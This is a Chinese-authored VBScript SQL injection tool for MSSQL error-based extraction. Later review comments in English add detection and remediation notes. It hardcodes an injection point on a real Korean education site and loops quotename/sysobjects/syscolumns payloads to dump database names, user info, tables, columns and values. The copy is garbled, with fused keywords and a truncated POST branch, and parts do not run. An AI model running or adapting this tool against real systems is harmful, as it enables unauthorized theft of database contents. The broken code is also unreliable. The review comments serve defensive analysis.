作者:Tr4c3
'为了保持脚本的通用性,放弃了and(selectcol_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入 Constmethod="Get"'提交方式请修改此处,有get和post可选
' Main script body (flat VBScript, intended for cscript). Reads Wscript.Arguments and, based on
' the argument count and keyword, loops calling sqlInj until the module-level strD comes back "".
' Every probe appends an " and ...quotename(...)=0--" clause to the fixed query string, and the
' per-request counter (i or k) is interpolated into a "select top N" subquery, so successive
' requests differ only in N.
' Detection notes: query strings carrying quotename(, sysobjects, syscolumns, object_id( or a
' "not in(select top N" subquery with N incrementing request by request from one client; every
' request also sets Referer to the page's own base URL (see sqlInj).
' NOTE(review): the "'[" ... "]'" extraction in sqlInj presumably depends on a database error
' string being echoed into the page; parameterizing the vulnerable query and suppressing detailed
' DB error output in responses removes that channel -- confirm against the affected application.
' NOTE(review): this copy is whitespace-mangled (keywords fused, two statements on one line) and
' the Dim list and the strUrl_B assignment sit after the comment marker on the next line, so as
' written nothing after the ConstDisPlay declaration on that line executes.
ConstDisPlay="D"'S = append output to result.txt, D = print to screen. DimstrUrl_B,strUrl,i,k,MyArray,strArg,strD strUrl_B="http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'"'the injection point varies per target, so it is edited by hand here
i=1'ordinal of the database currently being enumerated
k=0'ordinal of the table / column / value currently being enumerated
MyArray=Split(strUrl_B,"?",-1,1)
strUrl=MyArray(0)'base URL (everything before "?")
strArg=MyArray(1)'fixed query string that each probe is appended to
' NOTE(review): two statements are fused onto the next line in this copy.
SetArgs=Wscript.Arguments IfArgs.Count=0Then
ShowU
EndIf
'IfArgs.Count=1AndLCase(Args(0)) '****
'Dump database names / basic info
'****
IfArgs.Count=1Then
' "databases": probes db_name(i) for i = 1, 2, ... until a probe yields no bracketed text.
IfLCase(Trim(Args(0)))="databases"Then
ResuT("---------------===============================--------------")
ResuT("AllTheDataBases:") Do
strData="andquotename(db_name("&i&"))=0--"
sqlInj(strData)
i=i+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
' "info": three single probes -- current database, database user, system user.
ElseIfLCase(Trim(Args(0)))="info"then
ResuT("---------------===============================--------------")
ResuT("TheCurrentDatabaseis:")
strData="andquotename(db_name())=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("ThedatabaseUseris:")
strData="andquotename(user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("TheSystem_useris:")
strData="andquotename(System_user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf
EndIf
'****
'Dump table names: Args(0) = database, walks <db>.dbo.sysobjects (xtype char(85)) with k as the offset
'****
IfArgs.Count=2AndLCase(Trim(Args(1)))="tables"Then
ResuT("---------------===============================--------------")
ResuT("TheTablesOf"&Args(0))
Do
strData="and(selecttop1quotename(name)from"&Args(0)&".dbo.sysobjectswherextype=char(85)ANDnamenotin(selecttop"&k&"namefrom"&Args(0)&".dbo.sysobjectswherextype=char(85)))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf '****
'Dump column names: Args(0) = database, Args(1) = table, walks <db>.DBO.SYSCOLUMNS for object_id(<db>.dbo.<table>)
'****
IfArgs.Count=3AndLCase(Trim(Args(2)))="cols"Then
Database=Args(0)
Table=Args(1)
TarGet=DataBase&".dbo."&Table
TarGetCol=Database&".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("TheColumnsOf"&TarGet)
Do
strData="and(selecttop1Quotename(name)from"&TarGetCol&"whereid=object_id('"&TarGet&"')andnamenotin(selecttop"&k&"namefrom"&TarGetCol&"whereid=object_id('"&TarGet&"')))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf '****
'Dump column values: Args(0) = database, Args(1) = table, Args(2) = column, k as the offset
'****
IfArgs.Count=4AndLCase(Trim(Args(3)))="values"Then
Database=Args(0)
Table=Args(1)
col=Args(2)
Target=Database&".dbo."&Table
ResuT("---------------===============================--------------")
ResuT("TheValuesOf"&Args(2)&"in"&Target)
Do
strData="and(selecttop1quotename("&col&")from"&Target&"where"&col&"notin(selecttop"&k&""&col&"from"&Target&"))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
' NOTE(review): the header of Sub sqlInj is fused onto this EndIf line in this copy.
EndIf SubsqlInj(value)
' Body of Sub sqlInj(value); its header is fused onto the preceding EndIf line in this copy.
' Appends value to the fixed argument string strArg, sends the request through Microsoft.XMLHTTP
' (method comes from the Const in the file header: GET puts it in the query string, POST in a
' form body), then stores the response text found between "'[" and "]'" in the module-level strD
' and echoes it through ResuT. When the markers are absent strD is set to "", which is the stop
' condition of the Do ... Loop Until StrD="" loops in the main section.
' Every request carries Referer = strUrl (the page's own base URL).
IfUCase(method)="GET"Then
value=strArg&value
SetobjXML=CreateObject("Microsoft.XMLHTTP")
objXML.Open"GET",strUrl&"?"&value,False
objXML.SetRequestHeader"Referer",strUrl
'objXML.SetRequestHeader"Accept-Language","EUC-KR"
objXML.send()
strRevS=objXML.ResponseText'default
'strRevS=bytes2BSTR(objXML.ResponseBody)'sometimes needed for Korean text
' Extract the text strictly between the first "'[" and the first "]'".
IfInStr(strRevS,"'[")<>0AndInStr(strRevs,"]'")<>0Then
strD=Mid(strRevS,InStr(strRevS,"'[")+2,InStr(strRevs,"]'")-Instr(strRevS,"'[")-2)
ResuT("|"&strD)
Else
strD=""
EndIf
ElseIfUCase(method)="POST"Then
' NOTE(review): the POST branch is corrupted in this copy (the Open call and the InStr
' condition below are truncated) and does not parse as written.
value=strArg&value
SetobjXML=CreateObject("Microsoft.XMLHTTP")
objXML.Open"POST",False
objXML.SetRequestHeader"Content-Type","application/x-www-form-urlencoded"
objXML.SetRequestHeader"Referer",strUrl
objXML.send(UrlEncode(value))
strRevS=objXML.ResponseText'default
'strRevS=bytes2BSTR(objXML.ResponseBody)'sometimes needed for Korean text
IfInStr(strRevS,"'[")-2)
ResuT("|"&strD)
Else
strD=""
EndIf
EndIf
' NOTE(review): the header of Function ResuT is fused onto this EndSub line in this copy.
EndSub FunctionResuT(strInfo)
' Body of Function ResuT(strInfo); its header is fused onto the preceding EndSub line in this copy.
' Writes one line of output: with DisPlay="S" it is appended to result.txt in the working
' directory (OpenTextFile mode 8 = ForAppending, created if missing); with DisPlay="D" it goes to
' stdout via Wscript.Echo. Any other DisPlay value writes nothing. Declared as a Function but
' assigns no return value. fso1 is closed after each line; fso is released.
IfUCase(DisPlay)="S"Then
Setfso=CreateObject("Scripting.FileSystemObject")
Setfso1=fso.OpenTextFile("result.txt",8,True)
fso1.WriteLine(strInfo)
fso1.Close
Setfso=Nothing
ElseIfUCase(DisPlay)="D"Then
Wscript.Echo(strInfo)
EndIf
' NOTE(review): the header of Function UrlEncode is fused onto this EndFunction line in this copy.
EndFunction FunctionUrlEncode(str)
' Body of Function UrlEncode(str); its header is fused onto the preceding EndFunction line.
' Performs a single Replace and returns the result -- this is not a real URL encoder.
' NOTE(review): in this copy the search string is empty (""), so the call returns str unchanged;
' presumably a literal space was intended -- confirm against the original.
str=Replace(str,"","+")
UrlEncode=str
' NOTE(review): the header of Function bytes2BSTR is fused onto this EndFunction line in this copy.
EndFunction Functionbytes2BSTR(vIn)
' Body of Function bytes2BSTR(vIn); its header is fused onto the preceding EndFunction line.
' Converts a byte string to a BSTR: bytes below &H80 pass through as single characters; a
' higher byte is combined with the following byte into one character code
' (high * &H100 + low). Per the call sites this looks like a double-byte (Korean) decoder --
' not verified here.
' NOTE(review): the loop reads MidB(vIn,1) on every iteration rather than byte i (compare the
' MidB(vIn,i+1,1) read below), and it mutates the For loop variable i, which is also the
' module-level database counter declared in the header.
strReturn=""
Fori=1ToLenB(vIn)
ThisCharCode=AscB(MidB(vIn,1))
IfThisCharCode<&H80Then
strReturn=strReturn&Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))
i=i+1
EndIf
Next
bytes2BSTR=strReturn
' NOTE(review): the header of Sub showU is fused onto this EndFunction line in this copy.
EndFunction SubshowU()
' Body of Sub showU(); its header is fused onto the preceding EndFunction line in this copy.
' Prints the usage banner to stdout and terminates the script (.Quit inside With Wscript).
' Called from the main section when no arguments are given. The banner lines are runtime
' strings and are left exactly as written.
WithWscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("sql2005注射辅助脚本(粗糙版),用于mssql显错模式ByTr4c3[at]126[Dot]com")
.Echo("Usage:")
.Echo("cscript"&.ScriptName&"info--爆基本信息")
.Echo("cscript"&.ScriptName&"databases--爆所有库名")
.Echo("cscript"&.ScriptName&"pubstables--爆库pubs里所有用户表名")
.Echo("cscript"&.ScriptName&"pubsauthorscols--爆库pubs里authors表的所有字段名")
.Echo("cscript"&.ScriptName&"pubsauthorsau_idvalues--爆pubs.dbo.authors里au_id的值")
.Echo("+--------------------------=====================------------------------------+")
.Quit
Endwith
EndSub